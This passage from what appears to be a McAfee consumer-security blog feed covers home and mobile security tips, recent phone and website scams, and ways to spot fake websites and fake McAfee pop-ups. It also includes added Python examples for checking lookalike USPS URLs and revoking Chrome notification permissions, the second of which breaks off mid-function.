    Modern routers include built-in firewalls that monitor suspicious activity in both incoming and outgoing network traffic, blocking potentially harmful connections and unnecessary ports and services.

    Install an antivirus

    Antivirus programs are engineered to prevent, detect, and remove viruses and other types of malicious software. Antivirus software can run automatic scans on specific files or directories to make sure no malicious activity is present, and no network or data breach has occurred.

    McAfee’s antivirus software features key security capabilities, including malware detection, quarantine, and removal, as well as options for scanning files and applications, and an advanced firewall for home network security.

    Use multi-factor authentication when possible

    Multi-factor authentication is an authentication method that requires at least two pieces of evidence before granting access to a website. Using this method adds another layer of security to your applications and reduces the likelihood of a data breach.

    Choose a safe web browser

    Web browsers vary widely in terms of security features, with some offering just the basics and others providing a more complete range of features. Ideally, you should opt for a browser that offers the following security features:

    • Private session browsing
    • Pop-up blocking
    • Privacy features
    • Anti-phishing filter
    • Automatic blocking of reported malicious sites
    • Cross-site script filtering

    When properly implemented, these steps help ensure that your internet connection remains private, your data stays secure, and unauthorized users can’t access your network resources. Regular maintenance of these security settings, combined with staying informed about emerging threats, provides a solid foundation for safe and confident internet use.

    Internet mobile security

    These days, smartphones and tablets hold more personal information than ever before—from banking details and photos to work emails and location data. While this convenience makes life easier, it also creates new opportunities for cybercriminals to target your mobile devices. Just as you secure your network and desktop or laptop devices, treat your mobile devices with the same care. Here are some straightforward security practices that can significantly reduce your exposure to mobile threats:

    • Keep your operating system and apps updated: Software updates often include critical security patches that fix vulnerabilities criminals could exploit. Enable automatic updates for your device’s operating system and apps if possible, or check regularly for available updates in your device settings.
    • Download apps only from official stores: Stick to official app stores, such as Google Play Store or Apple App Store, which employ security measures to screen for malicious apps. Before downloading, read app reviews, check the developer’s reputation, and review what permissions the app requests.
    • Manage app permissions carefully: Regularly review and adjust app permissions in your device settings, limiting access to sensitive data like your camera, microphone, contacts, and location, unless absolutely necessary for the app’s core functionality.
    • Stay alert to SMS and messaging scams: Text message scams are becoming increasingly sophisticated, often impersonating legitimate companies or services. Never click links in unexpected text messages, and verify requests for personal information by contacting the company directly through official channels.
    • Use secure mobile browsers and settings: Configure your mobile browser with privacy and security settings that protect your data. Enable features such as pop-up blocking, disable location sharing unless needed, and consider using private browsing modes.
    • Activate device locks and biometric security: Use screen locks with PINs, passwords, patterns, or biometric authentication such as fingerprints or face recognition. Set your device to lock automatically after a short period of inactivity, and avoid using easily guessable codes, such as “1234” or your birthday.
    • Encrypt devices and backups: Turn on your device’s built-in encryption and create secure, encrypted backups of your important data to protect your information even if your smartphone is lost or stolen.
    • Set up remote lock and wipe capabilities: Enable remote tracking, lock, and wipe features on your devices. Services like Find My iPhone or Google’s Find My Device allow you to locate, lock, or remotely erase your entire device if it’s lost or stolen.
    • Exercise caution on public Wi-Fi networks: Avoid accessing sensitive accounts or conducting financial transactions on public networks, and consider using your phone’s mobile hotspot feature instead when you need internet access.

    FAQs about internet security

    Here are answers to the most frequently asked questions about online protection.

    What does internet security cover?

    Internet security protects you from a wide range of online threats, including viruses, malware, phishing attacks, identity theft, and data breaches. It also covers your devices, personal information, online accounts, and network connections to help you browse, shop, and communicate safely online.

    How is internet security different from antivirus software?

    While antivirus software focuses specifically on detecting and removing malicious programs, internet security provides comprehensive protection that includes antivirus software plus additional features such as firewalls, web protection, email security, identity monitoring, and safe browsing tools.

    Do Macs and smartphones need internet security protection?

    Yes, all devices that connect to the internet can be targeted by cybercriminals. Mobile devices and Macs face increasing security threats, including malicious apps, phishing attempts, and network attacks, making protection essential regardless of your device type.

    How can I stay safe on public Wi-Fi?

    Avoid accessing sensitive accounts or making purchases on public Wi-Fi networks. When using public Wi-Fi, stick to encrypted websites with “https” in the URL, avoid automatic connections, and consider using a VPN for added protection.

    How can you keep children safe online?

    As children grow older, their internet use becomes more extensive. To keep them safe online, educate them about the risks of web browsing and best practices to avoid online threats, such as not sharing passwords. Explain which information should be shared and which should be kept private. Instruct them to never click on links from unknown sources. Set up parental controls on certain websites to filter out inappropriate content and maintain a child-friendly interface.

    What are the signs that my account has been compromised?

    Watch for unexpected password reset emails, unfamiliar login notifications, unusual account activity, friends receiving spam from your accounts, or unauthorized charges on your financial statements. If you notice any of these signs, change your passwords immediately and contact the relevant service providers.

    How often should I update my software and devices?

    Enable automatic updates whenever possible and install security patches as soon as they become available. Regular updates address security vulnerabilities that criminals actively exploit, making staying current one of your best defenses against cyber threats.

    Final thoughts

    As more cyber threats emerge and expand in both scope and sophistication, it’s essential that you protect your online activities. Adequate protection doesn’t have to be complicated. Taking steps to install antivirus software, create strong and unique passwords, enable your firewall, and use multi-factor authentication will help build a strong defense against online threats.

    Start implementing these internet security measures today and enjoy the peace of mind that comes with knowing you’re protected online.

    For added security, consider using an all-in-one antivirus solution, such as McAfee, to safeguard your devices from online threats. Let McAfee handle your security, so you can focus on enjoying the internet.

    The post What Is Internet Security? appeared first on McAfee Blog.

    This Week in Scams: Phony AI Ads, Apple Account Takeover Attempts, and a PlayStation Scam

    By: McAfee

    For this week in scams, we have fake AI-generated shopping images that could spoil your holidays, scammers use an Apple Support ticket in a takeover attempt, and a PlayStation scam partly powered by AI.

    Let’s start with those fake ads, because holiday shopping is in full swing.

    Keep a sharp eye out for fake AI shopping ads that sell knockoff goods

    Turns out that three-quarters of people (74%) can’t correctly identify a fake AI-generated social media ad featuring popular holiday gifts—which could leave them open to online shopping scams.

    That finding, and several others, comes by way of research from Santander, a financial services company in the UK.

    Here’s a quick rundown of what else they found:

    • Less than one in 10 (8%) people feel “very confident” in their ability to spot an AI-generated ad on social media.
    • More than half (56%) fear that they or a family member could get scammed as a result.
    • About two-thirds (63%) said that they won’t purchase anything from social media platforms because they’re not sure what’s real and what’s fake.

    From the study … could you tell these ads are both fake?

    Fake ads, like this, have been popping up across social.

    Could you tell this ad is fake?

    In all, cheap and readily available AI tools make spinning up fake ads quick and easy work. The same goes for launching websites where those “goods” can get sold. In the past, we’ve seen scammers take two different approaches when they use social media ads and websites to lure in their victims:

    Phishing sites

    During the holidays, scammers pump out ads that offer seemingly outstanding deals on hot items. Of course, the offer and the site where it’s “sold” is fake. Victims hand over their personal info and credit card number, never to see the items they thought they’d purchased. On top of the money a victim loses, the scammer also has their card info and can run up its tab or sell it to others on the dark web.

    Knock-off sites

    In this case, the scammer indeed sells and delivers something. But you don’t get what you paid for. The item looks, feels, fits, or works entirely differently than what was advertised. In this way, people wind up with a cheaply made item cobbled together with inferior materials. Worse yet, these scams potentially prop up sweatshops, child labor, and other illegal operations in the process. Nothing about these sites and the things they sell on them is genuine.

    So, fake AI shopping ads are out there. What should you look out for? Here’s a quick list:

    • First off, any offer that sounds too good to be true and heavy discounts on hard-to-find or popular items are major signs of a scam—and have been for years running now.
    • See if the image looks a little too polished or even cartoony in some cases. As for people in AI ads, they can look airbrushed and have skin tones that seemingly give off an odd glow.
    • Look up reviews of the company. Trustpilot and the Better Business Bureau offer great resources for that. Even a simple search using “CompanyName scam” can give you an idea if it’s a scam or not.
    • And lastly, the combination of our Scam Detector and Web Protection can help sniff out a scam for you.

    The Apple Support scam that came from … Apple? (Not really. We’ll explain.)

    “I almost lost everything—my photos, my email, my entire digital life.”

    So opens a recent Medium post from Eric Moret recounting how he almost handed over his Apple Account to a scammer armed with a real Apple Support ticket to make this elaborate phishing attack look legit.

    Over the course of nearly 30 minutes, a scammer calmly and professionally walked Moret through a phony account takeover attempt.

    It started with two-factor authentication notifications that claimed someone was trying to access his iCloud account. Three minutes later, he got a call from an Atlanta-based number. The caller said they were with Apple Support. “Your account is under attack. We’re opening a ticket to help you. Someone will contact you shortly.”

    Seconds later came another call from the same number, which is where the scam fully kicked in. The person also said they were from Apple Support and that they’d opened a case on Moret’s behalf. Sure enough, when directed, Moret opened his email and saw a legitimate case number from a legitimate Apple address.

    The caller then told him to reset his password, which he did. Moret received a text with a link to a site where he could, apparently, close his case.

    Note that at no time during this process did the scammers directly ask him for his two-factor authentication code, a request that is always the sign of a scam. However, the scammers had another way to get it.

    The link took him to a site called “appeal-apple dot com,” which was in fact a scam site. However, the page looked official to him, and he entered a six-digit “confirmation code” sent by text to finish the process.

    That “confirmation code” was actually a fresh two-factor authentication code. With that finally in hand, the scammers signed in. Moret received a notice that a new device had logged into his account. Moret quickly reset his password again, which kicked them out and stopped the attack.

    So, what went wrong here? Let’s break down three key moments in this account takeover scam:

    • The unsolicited phone calls. That’s an immediate sign to hang up and call an official support number to confirm the “issue” yourself.
    • The fake website. A site with a URL like “appeal-apple dot com” is a scam site, even if it looks “official.” Scammers can create them easily today.
    • The code heist. Scammers trick people into handing over their authorization code by calling it something else, like a “confirmation code.”

    So, how can you protect yourself from account takeover scams? Let’s break that down too.

    • Know that Apple Support won’t call you or open a case on your behalf.
    • Also know that anyone can create an Apple Support ticket for anyone else, without verification. If you didn’t create it yourself, it’s a strong sign of a scam.
    • If you have concerns, call Apple yourself at 1-800-275-2273 or contact them through their Apple Support App, available here on Apple’s support page.
    • Only interact with Apple through sites and emails with the proper “apple dot com” address. Watch out for altered addresses like the “appeal-apple dot com” used here.
    • Never, ever share your authentication code in any way … verbally, in an email, in a text, or a website. Any request for it from anyone is a scam.
    • You can see the devices signed into your account any time. Go to Settings, tap your Name, and scroll to see all devices linked to your Apple ID.
    • Get protection that blocks links to scam sites, like our Scam Detector and Web Protection.

    The FCC takes aim at the Wal-Mart PlayStation 5 Robocall Scam

    Maybe you didn’t get a scam call from “Emma” or “Carl” at Wal-Mart, but plenty of people did. Around eight million in all. Now the Federal Communications Commission’s (FCC) Enforcement Bureau wants to put a stop to them.

    “Emma” and “Carl” are in fact a couple of AI voices fronting a scam framed around the bogus purchase of a PlayStation. It’s garnered its share of complaints, so much that the FCC has stepped in. It alleges that SK Teleco, a voice service provider, provisioned at least some of these calls, and that it must immediately stop.

    According to the FCC, the call plays out like this:

    “A preauthorized purchase of PlayStation 5 special edition with Pulse 3D headset is being ordered from your Walmart account for an amount of 919 dollars 45 cents. To cancel your order or to connect with one of our customer support representatives, please press ‘1.’ Thank you.”

    Pressing “1” connects you to a live operator who asks for personally identifiable information, such as Social Security numbers, to cancel the “purchase.”

    If you were wondering, it’s unlawful to place calls to cellphones containing artificial or prerecorded voice messages absent an emergency purpose or prior express consent. According to the FCC’s press release, SK Teleco didn’t respond to a request to investigate the calls. The FCC further alleges that it’s unlikely the company has any such consent.

    Per the FCC, “If SK Teleco fails to take swift action to prevent scam calls, the FCC will require all other providers to no longer accept call traffic from SK Teleco.”

    We’ll see how this plays out, yet it’s a good reminder to report scam calls. When it comes to any kind of scam, law enforcement and federal agencies act on complaints.

    Get a scam call? Here’s who you can report it to:

    And we close things out with a quick roundup …

    Here’s a quick list of a few stories that caught our eye this week:

    Scammers pose as law enforcement, threaten jail time if you don’t pay (with audio)

    Deepfake of North Carolina lawmaker used in award-winning Brazilian Whirlpool video

    What happens when you kick millions of teens off social media? Australia’s about to find out

    We’ll see you next Friday with more updates, scam news, and ways you can stay safer out there.

    The post This Week in Scams: Phony AI Ads, Apple Account Takeover Attempts, and a PlayStation Scam appeared first on McAfee Blog.

    Ways to Tell if a Website Is Fake

    By: McAfee

    Unfortunately, scammers today are coming at us from all angles, trying to trick us into giving up our hard-earned money. We all need to be vigilant in protecting ourselves online. If you aren’t paying attention, even if you know what to look for, they can still catch you off guard. There are numerous ways to detect fake sites, phishing, and other scams, including emails.

    Before we delve into the signs of fake websites, we will first take a closer look at the common types of scams that use websites, what happens when you accidentally access a fake website, and what you can do in case you unknowingly purchased items from it.

    What are fake or scam websites?

    Fake or scam websites are fraudulent sites that look legitimate while secretly attempting to steal your personal information, money, or account access.

    These deceptive platforms masquerade as trustworthy businesses or organizations, sending urgent messages that appear to be from popular shopping websites offering fantastic limited-time deals, banking websites requesting immediate account verification, government portals claiming you owe taxes or are eligible for refunds, and shipping companies asking for delivery fees.

    The urgency aims to trick you into logging in and sharing sensitive information, such as credit card numbers, Social Security details, login credentials, and personal data. Once you submit your data, the scammers will steal your identity, drain your accounts, or sell your details to other criminals on the dark web.

    These scam websites have become increasingly prevalent because they’re relatively inexpensive to create and can reach millions of potential victims quickly through email and text campaigns, social media ads, and search engine manipulation.

    Cybersecurity researchers and consumer protection agencies discover these fraudulent sites through various methods, including monitoring suspicious domain registrations, analyzing reported phishing attempts, and tracking unusual web traffic patterns. According to the FBI’s Internet Crime Complaint Center, losses from cyber-enabled fraud totaled $13.7 billion, with fake websites accounting for a significant portion of these losses.

    Consequences of visiting a fake website

    Visiting a fake website, accidentally or intentionally, can expose you to several serious security risks that can impact your digital life and financial well-being:

    • Credential theft: Scammers can capture your login information through fake login pages that look identical to legitimate sites. Once they have your username and password, they can access your real accounts and steal personal information or money.
    • Credit card fraud: When you enter your bank or credit card details on fraudulent shopping or fake service portals, scammers can use your payment information for unauthorized purchases or sell these to other criminals on the dark web.
    • Malware infection: Malicious downloads, infected ads, or drive-by downloads may happen automatically when you visit certain fake sites. These, in turn, can steal personal files, monitor your activity, or give criminals remote access to your device.
    • Identity theft: Fake sites can collect personal information, such as Social Security numbers, addresses, or birthdates, through fraudulent forms or surveys.
    • Account takeovers: Criminals can use stolen credentials to access your email, banking, or social media accounts, potentially locking you out and using your accounts for further scams.

    Common types of scam websites

    Scammers employ various tactics to create fake websites that appear authentic, but most of these techniques follow familiar patterns. Knowing the main types of scam sites helps you recognize danger faster. This section lists the most common categories of scam websites, explains how they operate, and identifies the red flags that alert you before they can steal your information or money.

    • Fake shopping stores: These fraudulent e-commerce sites steal your money and personal information without delivering products. They offer unrealistic discounts (70%+ off), have no customer service contact information, or accept payments only through wire transfers or gift cards. These sites often use stolen product images and fake customer reviews to appear legitimate.
    • Phishing login pages: These sites mimic legitimate services such as banks, email providers, or social media platforms to harvest your credentials. Their URLs don’t match the official domain, such as “bankofamerica-security.com” instead of “bankofamerica.com.” Their urgent messages claim your account will be suspended unless you log in immediately.
    • Tech support scam sites: These fake websites claim to detect computer problems and offer remote assistance for a fee. They begin with a pop-up ad with a loud alarm to warn you about viruses, providing phone numbers to call “immediately” or requesting remote desktop access from unsolicited contacts.
    • Investment and crypto sites: These sites guarantee incredible returns on cryptocurrency or investment opportunities, feature fake celebrity endorsements, or pressure you to invest quickly before a “limited-time opportunity” expires.
    • Giveaway and lottery pages: You receive notifications with a link to a page that claims you’ve won prizes in contests you never entered, but requires upfront fees or personal information to receive them. They will request bank account details to “process your winnings” or upfront processing fees.
    • Shipping and parcel update portals: These typically appear as tracking pages that mimic delivery services, such as USPS, UPS, or FedEx, to steal personal information or payment details. The pages ask for immediate payment to release and deliver the packages, or for login credentials to accounts you don’t have with that carrier.
    • Malware download pages: These ill-intentioned sites offer “free” but uncertified software, games, or media files that contain harmful code to infect your device once you click on the prominent “Download” button.
    • Advance fee and loan scams: These sites claim to guarantee approved loans or financial services, regardless of your credit score. But first, you will have to post an upfront payment or processing fees before any actual assistance is rendered.

    Understanding these common scam types helps you recognize fake sites before they can steal your information or money. When in doubt, verify legitimacy by visiting official websites directly through bookmarks or search engines rather than clicking suspicious links.

    For the latest warnings and protection guidance, check resources from the Federal Trade Commission and the FBI’s Internet Crime Complaint Center.

    Recognize a fake site

    You can protect yourself by learning to recognize the warning signs of fake sites. By understanding what these scams look like and how they operate, you’ll be better equipped to shop, bank, and browse online with confidence. Remember, legitimate companies will never pressure you to provide sensitive information through unsolicited emails or urgent pop-up messages.

    1. Mismatched domain name and brand: The website URL doesn’t match the company name they claim to represent, like “amazoon-deals.com” instead of “amazon.com.” Scammers use similar-looking domains to trick you into thinking you’re on a legitimate site.
    2. Spelling mistakes and poor grammar: Legitimate businesses invest in professionally created content to ensure clean and error-free writing or graphics. If you are on a site with multiple typos, awkward phrasing, or grammatical errors, this indicates that it was hastily created and not thoroughly reviewed, unlike authentic websites.
    3. Missing or invalid security certificate: The site lacks the “https://” prefix in the URL or displays security warnings in your browser. Without proper encryption, any information you enter can be intercepted by criminals.
    4. Fantastic deals: Look out for prices that are dramatically low—like designer items at 90% off or electronics at impossibly low costs. Scammers use unrealistic bargains to lure victims into providing payment information.
    5. High-pressure countdown timers: The site displays urgent messages such as “Only 2 left!” or countdown clocks with limited-time offers that reset when you refresh the page. These fake urgency tactics push you to make hasty decisions without proper research.
    6. No physical address, contact information, or legitimate business details: The site provides only an email address or contact form. In the same vein, any email address they provide may look strange, like northbank@hotmail.com. A legitimate business will not use a public email account, such as Hotmail, Gmail, or Yahoo.
    7. Missing or vague return policy: Legitimate businesses want satisfied customers and provide clear policies for returns and exchanges. Scams, however, often fail to provide clear refund policies, return instructions, or customer service information.
    8. Stolen or low-quality images: Scammers often steal images from legitimate sites without permission, making their product photos look pixelated, watermarked, or inconsistent in style and quality.
    9. Fake or generic reviews: Authentic reviews include specific details and a mix of ratings and comments. On fake websites, however, customer reviews are often overly positive, using generic language, posted on the same dates, or containing similar phrasing patterns.
    10. Limited payment options: Legitimate businesses offer secure payment options with buyer protection. Fake websites, however, only accept wire transfers, cryptocurrency, gift cards, or other non-reversible or untraceable payment methods.
    11. Recently registered domain: The website was created very recently—often just days or weeks ago, whereas established businesses typically have older, stable web presences.
    12. Fake password: If you’re at a fake site and type in a phony password, the fake site is likely to accept it.

    Recognize phishing, SMiShing, and other fake communications

    Most scams typically start with social engineering tactics, such as phishing, smishing, and fake social media messages containing suspicious links, before directing you to a fake website.

    From these communications, the scammers impersonate legitimate organizations before finally executing their malevolent intentions. To avoid being tricked, it is essential to recognize the warning signs wherever you encounter them.

    Email phishing red flags

    Fake emails are among the most common phishing attempts you’ll encounter. If you see any of these signs in an unsolicited email, it is best not to engage:

    • One way to recognize a phishing email is by its opening greeting. A legitimate email from your real bank or business will address you by name rather than a generic greeting like “Valued Customer” or something similar.
    • In the main message, look for urgent language, such as “Act now!” or “Your account will be suspended immediately.” Legitimate organizations rarely create artificial urgency around routine account matters. Also, pay attention to the sender’s email address. Authentic companies use official domains, not generic email services like Gmail or Yahoo for business communications.
    • Be suspicious of emails requesting your credentials, Social Security number, or other sensitive information. Banks and reputable companies will never ask for passwords or personal details via email.
    • Look closely at logos and formatting. Spoofed emails often contain low-resolution images, spelling errors, or slightly altered company logos that don’t match the authentic versions.

    SMS and text message scams

    Smishing messages bear the same signs as phishing emails and have become increasingly sophisticated. These fake messages often appear to come from delivery services, banks, or government agencies. Common tactics include fake package delivery notifications, urgent banking alerts, or messages claiming you’ve won prizes or need to verify account information.

    Legitimate organizations typically don’t include clickable links in unsolicited text messages, especially for account-related actions. When in doubt, don’t click the link—instead, open your banking app directly or visit the official website by typing the URL manually.

    Social media phishing

    Social media platforms give scammers new opportunities to create convincing fake profiles and pages. They might impersonate customer service accounts, create fake giveaways, or send direct messages requesting personal information. These fake profiles often use profile pictures and branding that closely resemble legitimate companies.

    Unusual sender behavior is another indicator of a scam across all platforms. This includes messages from contacts you haven’t heard from in years, communications from brands you don’t typically interact with, or requests that seem out of character for the supposed sender.

    Examples of fake or scam websites

    Scammers have become increasingly cunning in creating fake websites that closely mimic legitimate businesses and services. Here are some real-life examples of how cybercriminals use fake websites to victimize consumers:

    USPS-themed scams and websites

    Scammers exploit your trust in the United States Postal Service (USPS), designing sophisticated fake websites to steal your personal information, payment details, or money. They know you’re expecting a package or need to resolve a delivery issue, making you more likely to enter sensitive information without carefully verifying the site’s authenticity.

    USPS-themed smishing attacks arrive as text messages stating your package is delayed, undeliverable, or requires immediate action. Common phrases include “Pay $1.99 to reschedule delivery” or “Your package is held – click here to release.”

    Common URL tricks in USPS scams

    Scammers use various URL manipulation techniques to make their fake sites appear official. Watch for these red flags:

    • Misspelled domains: Sites like “uspps.com,” “uspo.com,” or “us-ps.com” instead of the official “usps.com”
    • Extra characters: URLs containing hyphens, numbers, or additional words like “usps-tracking.com” or “usps2024.com”
    • Different extensions: Domains ending in .net, .org, .info, or country codes instead of .com
    • Subdomain tricks: URLs like “usps.fake-site.com” where “usps” appears as a subdomain rather than the main domain
    • HTTPS absence: Legitimate USPS pages use secure HTTPS connections, while some fake sites may only use HTTP
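    As an added example that is not part of the McAfee article, the Python checker below applies the URL tests listed above (and the mismatched-domain check from the fake-site list earlier) to constructed sample URLs. The registrable-domain step assumes a simple last-two-labels rule rather than a full public-suffix list, and the allowlist holds only usps.com.

```python
"""
Lookalike-URL checker for the USPS tricks described in the article.
Added example, not McAfee's or USPS's code. Sample URLs are constructed.
"""
from urllib.parse import urlparse

# Constructed allowlist for this example: the one hostname treated as genuine.
OFFICIAL_DOMAIN = "usps.com"
BRAND = "usps"


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch misspellings such as 'uspps'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def registrable_domain(host: str) -> str:
    """Simplified (assumption): the last two labels, no public-suffix list."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify_url(url: str) -> list[str]:
    """Return the red flags found in `url`; an empty list means it is the official site."""
    scheme_given = "://" in url
    parsed = urlparse(url if scheme_given else "http://" + url)
    host = (parsed.hostname or "").lower()
    if not host:
        return ["no hostname"]

    flags: list[str] = []
    plain_http = scheme_given and parsed.scheme != "https"
    reg = registrable_domain(host)

    if reg == OFFICIAL_DOMAIN:
        # Genuine domain: the only remaining concern is an unencrypted scheme.
        return ["https absence"] if plain_http else []

    sld, _, tld = reg.partition(".")
    labels = host.split(".")

    # Subdomain trick: the brand appears as a subdomain of someone else's domain.
    if any(BRAND in label for label in labels[:-2]):
        flags.append("subdomain trick")
    # Different extension: correct brand label, wrong TLD (usps.net, usps.info).
    if sld == BRAND and tld != "com":
        flags.append("different extension")
    # Extra characters: brand embedded in a longer label (usps-tracking, usps2024).
    if sld != BRAND and BRAND in sld:
        flags.append("extra characters")
    # Misspelled domain: close to the brand but not equal (uspps, uspo, us-ps).
    if sld != BRAND and BRAND not in sld and edit_distance(sld, BRAND) <= 2:
        flags.append("misspelled domain")
    if plain_http:
        flags.append("https absence")
    if not flags:
        flags.append("not the official domain")
    return flags


if __name__ == "__main__":
    # Constructed samples mirroring the article's list.
    for sample in ["https://www.usps.com/", "http://usps.com", "uspps.com",
                   "usps-tracking.com", "usps.net", "https://usps.fake-site.com/track"]:
        print(f"{sample:40s} -> {classify_url(sample) or ['ok']}")
```

    A real deployment would replace the last-two-labels rule with a public-suffix list and extend the allowlist to every legitimate carrier domain you expect to see.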

    Verify through official USPS channels

    Always verify package information and delivery issues through official USPS channels before taking any action on suspicious websites or messages:

    • Official USPS website: Report the incident directly to usps.com by typing the URL into your browser rather than clicking links from emails or texts. Use the tracking tool on the homepage to check your package status with the official tracking number.
    • Official USPS mobile app: The USPS mobile app, available from official app stores, provides secure access to tracking, scheduling, and delivery management. Verify that you are downloading from USPS by checking the publisher name and official branding.
    • USPS Customer Service: If you receive conflicting information or suspect a scam, call USPS Customer Service at 1-800-ASK-USPS (1-800-275-8777) to verify delivery issues or payment requests.
    • Your local post office: When you need definitive verification, speak with postal workers at your local USPS location who can access your package information directly in their systems.

    Where and how to report fake USPS websites

    Reporting fake USPS websites helps protect others from falling victim to these scams and assists law enforcement in tracking down perpetrators.

    • Report to USPS: Forward suspicious emails to the United States Postal Inspection Service and report fake websites through the USPS website’s fraud reporting section. The Postal Inspection Service investigates mail fraud and online scams targeting postal customers.
    • File with the Federal Trade Commission: Report the fraudulent website at ReportFraud.ftc.gov, providing details about the fake site’s URL, any money lost, and screenshots of the fraudulent pages.
    • Contact the Federal Bureau of Investigation: Submit reports through the FBI’s Internet Crime Complaint Center, especially if you provided personal information or lost money to the scam.
    • Alert your state attorney general: Many state attorneys general’s offices track consumer fraud and can investigate scams targeting residents in their jurisdiction.

    Remember that legitimate USPS services are free for standard delivery confirmation and tracking. Any website demanding payment for basic package tracking or delivery should be treated as suspicious and verified through official USPS channels before providing any personal or financial information.

    Tech support pop-up ads scams

    According to the Federal Trade Commission, tech support scams cost Americans nearly $1.5 billion in 2024. These types of social engineering attacks are becoming increasingly sophisticated, making it more important than ever to verify security alerts through official channels.

    Sadly, many scammers are misusing the McAfee name to create fake tech support pop-up scams and trick you into believing your computer is infected or your protection has expired, and hoping you’ll act without thinking.

    These pop-ups typically appear while you’re browsing and claim your computer is severely infected with viruses, malware, or other threats. They use official-looking McAfee logos, colors, and messaging to appear legitimate to get you to call a fake support number, download malicious software, or pay for unnecessary services.

    Red flags of a fake McAfee pop-up

    Learning to detect fake sites and pop-ups protects you from scams. Be on the lookout for these warning signs:

    • Offering phone numbers to call immediately: Legitimate McAfee software never displays pop-ups demanding you call a phone number right away for virus removal.
    • Requests for remote access: Authentic McAfee alerts won’t ask you for permission to control your computer to “fix” issues remotely.
    • Immediate payment demands: Real McAfee pop-ups don’t require instant payment to resolve security threats.
    • Countdown timers: Fake alerts often include urgent timers claiming your computer will be “locked” or “damaged” if you don’t act immediately.
    • Poor grammar and spelling: Many fraudulent pop-ups contain obvious spelling and grammatical errors.
    • Browser-based alerts: Genuine McAfee software notifications appear from the actual installed program, not through your web browser.

    Properly close a McAfee-themed pop-up ad

    If you see a suspicious pop-up claiming to be from McAfee, here’s exactly what you should do:

    1. Close the tab without touching the page: Don’t click anywhere on the pop-up, not even its “X” button. On a scam page the close button is often just another link that starts a download or opens more windows. Close the tab from the keyboard instead (Ctrl+W on Windows, Command+W on Mac).
    2. Force-close the browser if the tab won’t go away: Open Task Manager with Ctrl+Shift+Esc (Windows) and end the browser process, or press Command+Option+Escape (Mac) to Force Quit it. Ctrl+Alt+Delete only opens the Windows security screen; it does not close anything by itself.
    3. Don’t call any phone numbers: Never call support numbers displayed on the pop-ups, as these connect you directly to scammers.
    4. Avoid downloading software: Don’t download any “cleaning” or “security” tools offered through pop-ups.
    5. Clear your browser cache: After closing the pop-up, clear your browser’s cache and cookies to remove any tracking elements.

    Verify your actual McAfee protection status

    To check if your McAfee protection is genuinely active and up-to-date:

    • Open your installed McAfee software directly: Click on the McAfee icon in your system tray or search for McAfee in your Start menu.
    • Visit the official McAfee website: Go directly to mcafee.com by typing it into your address bar.
    • Log in to your McAfee account: Check your subscription status through your official McAfee online account.
    • Use the McAfee mobile app: Download the official McAfee Mobile Security app to monitor your protection remotely.

    Remember, legitimate McAfee software updates and notifications come through the installed program itself, not through random browser pop-ups. Your actual McAfee protection works quietly in the background without bombarding you with alarming messages.

    Crush fake tech support pop-ups

    Stay protected by trusting your installed McAfee software and always verifying security alerts through official McAfee channels, such as your installed McAfee dashboard or the official website.

    1. Close your browser safely. If you see a fake McAfee pop-up claiming your computer is infected, don’t click anything on the pop-up. Instead, close your browser completely using Alt+F4 (Windows) or Command+Q (Mac). If the pop-up does not close, open Task Manager (Ctrl+Shift+Esc) and end the browser process. This stops the page’s scripts. A web page on its own cannot reach into your system; the real danger is what the scammers talk you into next, such as granting remote access or running a download.
    2. Clear browser permissions. Fake security pop-ups often trick you into allowing notifications that can bombard you with more scam alerts. Go to your browser settings and revoke notification permissions for suspicious sites. In Chrome, go to Settings > Privacy and Security > Site Settings > Notifications, then remove any unfamiliar or suspicious websites from the list of allowed sites.
    3. Remove suspicious browser extensions. Malicious extensions can generate fake McAfee alerts and redirect you to scam websites. Check your browser extensions by going to the extensions menu and removing any that you don’t recognize or that you didn’t intentionally install.
    4. Reset your browser settings. If fake pop-ups persist, reset your browser to its default settings to remove unwanted changes made by malicious websites or extensions, while preserving your bookmarks and saved passwords. In most browsers, you can find the reset option under Advanced Settings.
    5. Run a complete security scan. Use your legitimate antivirus software to perform a full system scan. If you don’t have security software, download a reputable program from the official vendor’s website only, such as McAfee Total Protection, to detect and remove any malware that might be generating the fake pop-ups.
    6. Update your operating system and browser. Ensure your device has the latest security and web browser updates installed, which often include patches for vulnerabilities that scammers exploit. Enable automatic updates to stay protected against future threats.
    7. Review and adjust notification settings. Configure your browser to block pop-ups and to stop sites from sending you notifications. You may be tempted to let a few sites send you alerts, but we suggest erring on the side of caution and blocking all notifications.
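Step 2 above is a manual pass through Chrome’s notification list. As an added example (not code from the original post or from McAfee), here is a Python script that performs the same audit against a copy of Chrome’s `Preferences` file: it lists every origin currently allowed to send notifications and switches all but an allowlist to “block”. The JSON key path (`profile.content_settings.exceptions.notifications`) and the setting codes (1 = allow, 2 = block) are assumptions drawn from inspecting Chrome profiles, not from the article, and the sample preferences below are constructed. Close Chrome before writing the real file, because Chrome rewrites `Preferences` on exit.

```python
import copy
import json

# Constructed sample of the relevant slice of a Chrome "Preferences" file.
# The key path and the setting codes (1 = allow, 2 = block) are assumptions drawn
# from inspecting Chrome profiles; they are not from the original article.
SAMPLE_PREFERENCES = json.dumps({
    "profile": {
        "content_settings": {
            "exceptions": {
                "notifications": {
                    "https://calendar.example.com:443,*": {"setting": 1},
                    "https://mcafee-alert-scan-now.example:443,*": {"setting": 1},
                    "https://news.example.org:443,*": {"setting": 2},
                }
            }
        }
    }
})

NOTIFICATIONS_PATH = ("profile", "content_settings", "exceptions", "notifications")
ALLOW, BLOCK = 1, 2


def notification_exceptions(prefs: dict) -> dict:
    """Return the notification exception map, or {} if the profile has none."""
    node = prefs
    for key in NOTIFICATIONS_PATH:
        node = node.get(key, {})
    return node


def origin_of(pattern: str) -> str:
    """Chrome keys exceptions as 'primary,secondary'; only the primary origin matters."""
    return pattern.split(",", 1)[0]


def allowed_notification_sites(prefs: dict) -> list:
    """Origins currently allowed to push notifications, sorted for stable output."""
    return sorted(origin_of(p) for p, entry in notification_exceptions(prefs).items()
                  if entry.get("setting") == ALLOW)


def revoke_notifications(prefs: dict, keep=()) -> dict:
    """Copy of prefs in which every allowed origin not in `keep` is switched to block."""
    new_prefs = copy.deepcopy(prefs)
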